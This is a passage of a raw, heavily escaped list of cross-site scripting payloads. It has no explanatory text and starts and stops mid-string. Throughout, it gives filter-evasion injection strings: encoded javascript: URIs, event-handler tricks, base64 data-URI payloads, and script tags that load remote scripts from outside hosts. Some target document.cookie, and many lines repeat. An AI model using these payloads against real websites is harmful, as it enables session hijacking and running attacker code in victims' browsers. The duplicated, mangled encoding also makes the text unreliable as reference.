xlink:href=\\\&quot;//jsfiddle.net/t846h/\\\&quot;&gt;click\\r\\n&lt;embed code=\\\&quot;http://businessinfo.co.uk/labs/xss/xss.swf\\\&quot; allowscriptaccess=always&gt;\\r\\n&lt;svg contentScriptType=text/vbs&gt;&lt;script&gt;MsgBox+1\\r\\n&lt;a href=\\\&quot;data:text/html;base64_,&lt;svg/onload=\\\\u0061&amp;#x6C;&amp;#101%72t(1)&gt;\\\&quot;&gt;X&lt;/a\\r\\n&lt;iframe/onreadystatechange=\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(\\\&#039;\\\\u0061\\\&#039;) worksinIE&gt;\\r\\n&lt;script&gt;~\\\&#039;\\\\u0061\\\&#039; ; \\\\u0074\\\\u0068\\\\u0072\\\\u006F\\\\u0077 ~ \\\\u0074\\\\u0068\\\\u0069\\\\u0073. \\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(~\\\&#039;\\\\u0061\\\&#039;)&lt;/script U+\\r\\n&lt;script/src=\\\&quot;data&amp;colon;text%2Fj\\\\u0061v\\\\u0061script,\\\\u0061lert(\\\&#039;\\\\u0061\\\&#039;)\\\&quot;&gt;&lt;/script a=\\\\u0061 &amp; /=%2F\\r\\n&lt;script/src=data&amp;colon;text/j\\\\u0061v\\\\u0061&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116,\\\\u0061%6C%65%72%74(/XSS/)&gt;&lt;/script\\r\\n&lt;object data=javascript&amp;colon;\\\\u0061&amp;#x6C;&amp;#101%72t(1)&gt;\\r\\n&lt;script&gt;+-+-1-+-+alert(1)&lt;/script&gt;\\r\\n&lt;body/onload=&amp;lt;!--&amp;gt;&amp;#10alert(1)&gt;\\r\\n&lt;script itworksinallbrowsers&gt;/*&lt;script* */alert(1)&lt;/script\\r\\n&lt;img src ?itworksonchrome?\\\\/onerror = alert(1)\\r\\n&lt;svg&gt;&lt;script&gt;//&amp;NewLine;confirm(1);&lt;/script &lt;/svg&gt;\\r\\n&lt;svg&gt;&lt;script onlypossibleinopera:-)&gt; alert(1)\\r\\n&lt;a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&amp;#97v&amp;#97script&amp;#x3A;&amp;#97lert(1)&gt;ClickMe\\r\\n&lt;script x&gt; alert(1) &lt;/script 1=2\\r\\n&lt;div/onmouseover=\\\&#039;alert(1)\\\&#039;&gt; style=\\\&quot;x:\\\&quot;&gt;\\r\\n&lt;--`&lt;img/src=` onerror=alert(1)&gt; --!&gt;\\r\\n&lt;script/src=&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,&amp;#x0061;&amp;#x06c;&amp;#x0065;&amp;#x00000072;&amp;#x00074;(1)&gt;&lt;/script&gt;\\r\\n&lt;div style=\\\&quot;position:absolute;top:0;left:0;width:100%;height:100%\\\&quot; onmouseover=\\\&quot;prompt(1)\\\&quot; onclick=\\\&quot;alert(1)\\\&quot;&gt;x&lt;/button&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=window.open(\\\&#039;https://www.google.com/\\\&#039;);&gt;\\r\\n&lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1)&gt;CLICKME\\r\\n&lt;math&gt;&lt;a xlink:href=\\\&quot;//jsfiddle.net/t846h/\\\&quot;&gt;click\\r\\n&lt;object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+&gt;&lt;/object&gt;\\r\\n&lt;iframe src=\\\&quot;data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\\\&quot;&gt;&lt;/iframe&gt;\\r\\n&lt;a href=\\\&quot;data:text/html;blabla,&amp;#60&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#32&amp;#115&amp;#114&amp;#99&amp;#61&amp;#34&amp;#104&amp;#116&amp;#116&amp;#112&amp;#58&amp;#47&amp;#47&amp;#115&amp;#116&amp;#101&amp;#114&amp;#110&amp;#101&amp;#102&amp;#97&amp;#109&amp;#105&amp;#108&amp;#121&amp;#46&amp;#110&amp;#101&amp;#116&amp;#47&amp;#102&amp;#111&amp;#111&amp;#46&amp;#106&amp;#115&amp;#34&amp;#62&amp;#60&amp;#47&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#62&amp;#8203\\\&quot;&gt;Click Me&lt;/a&gt;\\r\\n‘; alert(1);\\r\\n‘)alert(1);//\\r\\n&lt;ScRiPt&gt;alert(1)&lt;/sCriPt&gt;\\r\\n&lt;IMG SRC=jAVasCrIPt:alert(‘XSS’)&gt;\\r\\n&lt;IMG SRC=”javascript:alert(‘XSS’);”&gt;\\r\\n&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;\\r\\n&lt;IMG SRC=javascript:alert(‘XSS’)&gt; \\r\\n&lt;img src=xss onerror=alert(1)&gt;\\r\\n&lt;iframe %00 src=\\\&quot;&amp;Tab;javascript:prompt(1)&amp;Tab;\\\&quot;%00&gt;\\r\\n&lt;svg&gt;&lt;style&gt;{font-family&amp;colon;\\\&#039;&lt;iframe/onload=confirm(1)&gt;\\\&#039;\\r\\n&lt;input/onmouseover=\\\&quot;javaSCRIPT&amp;colon;confirm&amp;lpar;1&amp;rpar;\\\&quot;\\r\\n&lt;sVg&gt;&lt;scRipt %00&gt;alert&amp;lpar;1&amp;rpar; {Opera}\\r\\n&lt;img/src=`%00` onerror=this.onerror=confirm(1)\\r\\n&lt;form&gt;&lt;isindex formaction=\\\&quot;javascript&amp;colon;confirm(1)\\\&quot;\\r\\n&lt;img src=`%00`&amp;NewLine; onerror=alert(1)&amp;NewLine;\\r\\n&lt;script/&amp;Tab; src=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039; /&amp;Tab;&gt;&lt;/script&gt;\\r\\n&lt;ScRipT 5-0*3+9/3=&gt;prompt(1)&lt;/ScRipT giveanswerhere=?\\r\\n&lt;iframe/src=\\\&quot;data:text/html;&amp;Tab;base64&amp;Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\\\&quot;&gt;\\r\\n&lt;script /*%00*/&gt;/*%00*/alert(1)/*%00*/&lt;/script /*%00*/\\r\\n&amp;#34;&amp;#62;&lt;h1/onmouseover=\\\&#039;\\\\u0061lert(1)\\\&#039;&gt;%00\\r\\n&lt;iframe/src=\\\&quot;data:text/html,&lt;svg &amp;#111;&amp;#110;load=alert(1)&gt;\\\&quot;&gt;\\r\\n&lt;meta content=\\\&quot;&amp;NewLine; 1 &amp;NewLine;; JAVASCRIPT&amp;colon; alert(1)\\\&quot; http-equiv=\\\&quot;refresh\\\&quot;/&gt;\\r\\n&lt;svg&gt;&lt;script xlink:href=data&amp;colon;,window.open(\\\&#039;https://www.google.com/\\\&#039;)&gt;&lt;/script\\r\\n&lt;svg&gt;&lt;script x:href=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039; {Opera}\\r\\n&lt;meta http-equiv=\\\&quot;refresh\\\&quot; content=\\\&quot;0;url=javascript:confirm(1)\\\&quot;&gt;\\r\\n&lt;iframe src=javascript&amp;colon;alert&amp;lpar;document&amp;period;location&amp;rpar;&gt;\\r\\n&lt;form&gt;&lt;a href=\\\&quot;javascript:\\\\u0061lert&amp;#x28;1&amp;#x29;\\\&quot;&gt;X\\r\\n&lt;/script&gt;&lt;img/*%00/src=\\\&quot;worksinchrome&amp;colon;prompt&amp;#x28;1&amp;#x29;\\\&quot;/%00*/onerror=\\\&#039;eval(src)\\\&#039;&gt;\\r\\n&lt;img/&amp;#09;&amp;#10;&amp;#11; src=`~` onerror=prompt(1)&gt;\\r\\n&lt;form&gt;&lt;iframe &amp;#09;&amp;#10;&amp;#11; src=\\\&quot;javascript&amp;#58;alert(1)\\\&quot;&amp;#11;&amp;#10;&amp;#09;;&gt;\\r\\n&lt;a href=\\\&quot;data:application/x-x509-user-cert;&amp;NewLine;base64&amp;NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\&quot;&amp;#09;&amp;#10;&amp;#11;&gt;X&lt;/a\\r\\nhttp://www.google&lt;script .com&gt;alert(document.location)&lt;/script\\r\\n&lt;a&amp;#32;href&amp;#61;&amp;#91;&amp;#00;&amp;#93;\\\&quot;&amp;#00; onmouseover=prompt&amp;#40;1&amp;#41;&amp;#47;&amp;#47;\\\&quot;&gt;XYZ&lt;/a\\r\\n&lt;img/src=@&amp;#32;&amp;#13; onerror = prompt(\\\&#039;&amp;#49;\\\&#039;)\\r\\n&lt;style/onload=prompt&amp;#40;\\\&#039;&amp;#88;&amp;#83;&amp;#83;\\\&#039;&amp;#41;\\r\\n&lt;script ^__^&gt;alert(String.fromCharCode(49))&lt;/script ^__^\\r\\n&lt;/style &amp;#32;&gt;&lt;script &amp;#32; :-(&gt;/**/alert(document.location)/**/&lt;/script &amp;#32; :-(\\r\\n&amp;#00;&lt;/form&gt;&lt;input type&amp;#61;\\\&quot;date\\\&quot; onfocus=\\\&quot;alert(1)\\\&quot;&gt;\\r\\n&lt;form&gt;&lt;textarea &amp;#13; onkeyup=\\\&#039;\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074&amp;#x28;1&amp;#x29;\\\&#039;&gt;\\r\\n&lt;script /***/&gt;/***/confirm(\\\&#039;\\\\uFF41\\\\uFF4C\\\\uFF45\\\\uFF52\\\\uFF54\\\\u1455\\\\uFF11\\\\u1450\\\&#039;)/***/&lt;/script /***/\\r\\n&lt;iframe srcdoc=\\\&#039;&amp;lt;body onload=prompt&amp;lpar;1&amp;rpar;&amp;gt;\\\&#039;&gt;\\r\\n&lt;a href=\\\&quot;javascript:void(0)\\\&quot; onmouseover=&amp;NewLine;javascript:alert(1)&amp;NewLine;&gt;X&lt;/a&gt;\\r\\n&lt;script ~~~&gt;alert(0%0)&lt;/script ~~~&gt;\\r\\n&lt;style/onload=&amp;lt;!--&amp;#09;&amp;gt;&amp;#10;alert&amp;#10;&amp;lpar;1&amp;rpar;&gt;\\r\\n&lt;///style///&gt;&lt;span %2F onmousemove=\\\&#039;alert&amp;lpar;1&amp;rpar;\\\&#039;&gt;SPAN\\r\\n&lt;img/src=\\\&#039;http://i.imgur.com/P8mL8.jpg\\\&#039; onmouseover=&amp;Tab;prompt(1)\\r\\n&amp;#34;&amp;#62;&lt;svg&gt;&lt;style&gt;{-o-link-source&amp;colon;\\\&#039;&lt;body/onload=confirm(1)&gt;\\\&#039;\\r\\n&amp;#13;&lt;blink/&amp;#13; onmouseover=pr&amp;#x6F;mp&amp;#116;(1)&gt;OnMouseOver {Firefox &amp; Opera}\\r\\n&lt;marquee onstart=\\\&#039;javascript:alert&amp;#x28;1&amp;#x29;\\\&#039;&gt;^__^\\r\\n&lt;div/style=\\\&quot;width:expression(confirm(1))\\\&quot;&gt;X&lt;/div&gt; {IE7}\\r\\n&lt;iframe/%00/ src=javaSCRIPT&amp;colon;alert(1)\\r\\n//&lt;form/action=javascript&amp;#x3A;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;&lt;input/type=\\\&#039;submit\\\&#039;&gt;//\\r\\n/*iframe/src*/&lt;iframe/src=\\\&quot;&lt;iframe/src=@\\\&quot;/onload=prompt(1) /*iframe/src*/&gt;\\r\\n//|\\\\\\\\ &lt;script //|\\\\\\\\ src=\\\&#039;https://dl.dropbox.com/u/13018058/js.js\\\&#039;&gt; //|\\\\\\\\ &lt;/script //|\\\\\\\\\\r\\n&lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src&amp;#x3A;\\\&#039;&lt;style/onload=this.onload=confirm(1)&gt;\\\&#039;&lt;/font&gt;/&lt;/style&gt;\\r\\n&lt;a/href=\\\&quot;javascript:&amp;#13; javascript:prompt(1)\\\&quot;&gt;&lt;input type=\\\&quot;X\\\&quot;&gt;\\r\\n&lt;/plaintext\\\\&gt;&lt;/|\\\\&gt;&lt;plaintext/onmouseover=prompt(1)\\r\\n&lt;/svg&gt;\\\&#039;\\\&#039;&lt;svg&gt;&lt;script \\\&#039;AQuickBrownFoxJumpsOverTheLazyDog\\\&#039;&gt;alert&amp;#x28;1&amp;#x29; {Opera}\\r\\n&lt;a href=\\\&quot;javascript&amp;colon;\\\\u0061&amp;#x6C;&amp;#101%72t&amp;lpar;1&amp;rpar;\\\&quot;&gt;&lt;button&gt;\\r\\n&lt;div onmouseover=\\\&#039;alert&amp;lpar;1&amp;rpar;\\\&#039;&gt;DIV&lt;/div&gt;\\r\\n&lt;iframe style=\\\&quot;xg-p:absolute;top:0;left:0;width:100%;height:100%\\\&quot; onmouseover=\\\&quot;prompt(1)\\\&quot;&gt;\\r\\n&lt;a href=\\\&quot;jAvAsCrIpT&amp;colon;alert&amp;lpar;1&amp;rpar;\\\&quot;&gt;X&lt;/a&gt;\\r\\n&lt;embed src=\\\&quot;http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\&quot;&gt;\\r\\n&lt;object data=\\\&quot;http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\\\&quot;&gt;\\r\\n&lt;var onmouseover=\\\&quot;prompt(1)\\\&quot;&gt;On Mouse Over&lt;/var&gt;\\r\\n&lt;a href=javascript&amp;colon;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;Click Here&lt;/a&gt;\\r\\n&lt;img src=\\\&quot;/\\\&quot; =_=\\\&quot; title=\\\&quot;onerror=\\\&#039;prompt(1)\\\&#039;\\\&quot;&gt;\\r\\n&lt;%&lt;!--\\\&#039;%&gt;&lt;script&gt;alert(1);&lt;/script --&gt;\\r\\n&lt;script src=\\\&quot;data:text/javascript,alert(1)\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;iframe/src \\\\/\\\\/onload = prompt(1)\\r\\n&lt;iframe/onreadystatechange=alert(1)\\r\\n&lt;svg/onload=alert(1)\\r\\n&lt;input value=&lt;&gt;&lt;iframe/src=javascript:confirm(1)\\r\\n&lt;input type=\\\&quot;text\\\&quot; value=`` &lt;div/onmouseover=\\\&#039;alert(1)\\\&#039;&gt;X&lt;/div&gt;\\r\\nhttp://www.&lt;script&gt;alert(1)&lt;/script .com\\r\\n&lt;iframe src=j&amp;NewLine;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;v&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;s&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;c&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;i&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;p&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;colon;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;l&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;e&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;28&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;1&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;%29&gt;&lt;/iframe&gt;\\r\\n&lt;svg&gt;&lt;script ?&gt;alert(1)\\r\\n&lt;iframe src=j&amp;Tab;a&amp;Tab;v&amp;Tab;a&amp;Tab;s&amp;Tab;c&amp;Tab;r&amp;Tab;i&amp;Tab;p&amp;Tab;t&amp;Tab;:a&amp;Tab;l&amp;Tab;e&amp;Tab;r&amp;Tab;t&amp;Tab;%28&amp;Tab;1&amp;Tab;%29&gt;&lt;/iframe&gt;\\r\\n&lt;img src=`xx:xx`onerror=alert(1)&gt;\\r\\n&lt;meta http-equiv=\\\&quot;refresh\\\&quot; content=\\\&quot;0;javascript&amp;colon;alert(1)\\\&quot;/&gt;\\r\\n&lt;math&gt;&lt;a xlink:href=\\\&quot;//jsfiddle.net/t846h/\\\&quot;&gt;click\\r\\n&lt;embed code=\\\&quot;http://businessinfo.co.uk/labs/xss/xss.swf\\\&quot; allowscriptaccess=always&gt;\\r\\n&lt;svg contentScriptType=text/vbs&gt;&lt;script&gt;MsgBox+1\\r\\n&lt;a href=\\\&quot;data:text/html;base64_,&lt;svg/onload=\\\\u0061&amp;#x6C;&amp;#101%72t(1)&gt;\\\&quot;&gt;X&lt;/a\\r\\n&lt;iframe/onreadystatechange=\\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(\\\&#039;\\\\u0061\\\&#039;) worksinIE&gt;\\r\\n&lt;script&gt;~\\\&#039;\\\\u0061\\\&#039; ; \\\\u0074\\\\u0068\\\\u0072\\\\u006F\\\\u0077 ~ \\\\u0074\\\\u0068\\\\u0069\\\\u0073. \\\\u0061\\\\u006C\\\\u0065\\\\u0072\\\\u0074(~\\\&#039;\\\\u0061\\\&#039;)&lt;/script U+\\r\\n&lt;script/src=\\\&quot;data&amp;colon;text%2Fj\\\\u0061v\\\\u0061script,\\\\u0061lert(\\\&#039;\\\\u0061\\\&#039;)\\\&quot;&gt;&lt;/script a=\\\\u0061 &amp; /=%2F\\r\\n&lt;script/src=data&amp;colon;text/j\\\\u0061v\\\\u0061&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116,\\\\u0061%6C%65%72%74(/XSS/)&gt;&lt;/script\\r\\n&lt;object data=javascript&amp;colon;\\\\u0061&amp;#x6C;&amp;#101%72t(1)&gt;\\r\\n&lt;script&gt;+-+-1-+-+alert(1)&lt;/script&gt;\\r\\n&lt;body/onload=&amp;lt;!--&amp;gt;&amp;#10alert(1)&gt;\\r\\n&lt;script itworksinallbrowsers&gt;/*&lt;script* */alert(1)&lt;/script\\r\\n&lt;img src ?itworksonchrome?\\\\/onerror = alert(1)\\r\\n&lt;svg&gt;&lt;script&gt;//&amp;NewLine;confirm(1);&lt;/script &lt;/svg&gt;\\r\\n&lt;svg&gt;&lt;script onlypossibleinopera:-)&gt; alert(1)\\r\\n&lt;a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&amp;#97v&amp;#97script&amp;#x3A;&amp;#97lert(1)&gt;ClickMe\\r\\n&lt;script x&gt; alert(1) &lt;/script 1=2\\r\\n&lt;div/onmouseover=\\\&#039;alert(1)\\\&#039;&gt; style=\\\&quot;x:\\\&quot;&gt;\\r\\n&lt;--`&lt;img/src=` onerror=alert(1)&gt; --!&gt;\\r\\n &lt;script/src=&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,&amp;#x0061;&amp;#x06c;&amp;#x0065;&amp;#x00000072;&amp;#x00074;(1)&gt;&lt;/script&gt;\\r\\n&lt;div style=\\\&quot;xg-p:absolute;top:0;left:0;width:100%;height:100%\\\&quot; onmouseover=\\\&quot;prompt(1)\\\&quot; onclick=\\\&quot;alert(1)\\\&quot;&gt;x&lt;/button&gt;\\r\\n\\\&quot;&gt;&lt;img src=x onerror=window.open(\\\&#039;https://www.google.com/\\\&#039;);&gt;\\r\\n&lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1)&gt;CLICKME\\r\\n&lt;math&gt;&lt;a xlink:href=\\\&quot;//jsfiddle.net/t846h/\\\&quot;&gt;click\\r\\n&lt;object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+&gt;&lt;/object&gt;\\r\\n&lt;iframe src=\\\&quot;data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\\\&quot;&gt;&lt;/iframe&gt;\\r\\n&lt;a href=\\\&quot;data:text/html;blabla,&amp;#60&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#32&amp;#115&amp;#114&amp;#99&amp;#61&amp;#34&amp;#104&amp;#116&amp;#116&amp;#112&amp;#58&amp;#47&amp;#47&amp;#115&amp;#116&amp;#101&amp;#114&amp;#110&amp;#101&amp;#102&amp;#97&amp;#109&amp;#105&amp;#108&amp;#121&amp;#46&amp;#110&amp;#101&amp;#116&amp;#47&amp;#102&amp;#111&amp;#111&amp;#46&amp;#106&amp;#115&amp;#34&amp;#62&amp;#60&amp;#47&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#62&amp;#8203\\\&quot;&gt;Click Me&lt;/a&gt;\\r\\n&lt;SCRIPT&gt;String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)&lt;/SCRIPT&gt;\\r\\n‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–&gt;&lt;/SCRIPT&gt;”&gt;’&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n&lt;IMG “””&gt;&lt;SCRIPT&gt;alert(“XSS”)&lt;/SCRIPT&gt;”&gt;\\r\\n&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;\\r\\n&lt;IMG SRC=”jav ascript:alert(‘XSS’);”&gt;\\r\\n&lt;IMG SRC=”jav&amp;#x09;ascript:alert(‘XSS’);”&gt;\\r\\n&lt;&lt;SCRIPT&gt;alert(“XSS”);//&lt;&lt;/SCRIPT&gt;\\r\\n%253cscript%253ealert(1)%253c/script%253e\\r\\n“&gt;&lt;s”%2b”cript&gt;alert(document.cookie)&lt;/script&gt;\\r\\nfoo&lt;script&gt;alert(1)&lt;/script&gt;\\r\\n&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;/script&gt;ipt&gt;\\r\\n&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;\\r\\n&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;\\r\\n&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;\\r\\n&lt;BODY BACKGROUND=”javascript:alert(‘XSS’)”&gt;\\r\\n&lt;BODY ONLOAD=alert(‘XSS’)&gt;\\r\\n&lt;INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”&gt;\\r\\n&lt;IMG SRC=”javascript:alert(‘XSS’)”\\r\\n&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;\\r\\njavascript:alert(\\\&quot;hellox worldss\\\&quot;)\\r\\n&lt;img src=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;img src=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;\\r\\n&lt;\\\&quot;\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\\\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode(88,83,83))//\\\\\\\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\\\&quot;&gt;\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\&quot;&gt;\\r\\n&lt;IFRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;EMBED SRC=\\\&quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\&quot; type=\\\&quot;image/svg+xml\\\&quot; AllowScriptAccess=\\\&quot;always\\\&quot;&gt;&lt;/EMBED&gt;\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&quot; \\\&#039;\\\&#039; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT \\\&quot;a=\\\&#039;&gt;\\\&#039;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&#039;&gt;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT&gt;document.write(\\\&quot;&lt;SCRI\\\&quot;);&lt;/SCRIPT&gt;PT SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;);//&lt;&lt;/SCRIPT&gt;\\r\\n&lt;\\\&quot;\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\\\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode(88,83,83))//\\\\\\\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\\\&quot;&gt;\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\\\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode(88,83,83))//\\\\\\\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\\\&quot;&gt;\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;?/SCRIPT&gt;&amp;submit.x=27&amp;submit.y=9&amp;cmd=search\\r\\n&lt;script&gt;alert(\\\&quot;hellox 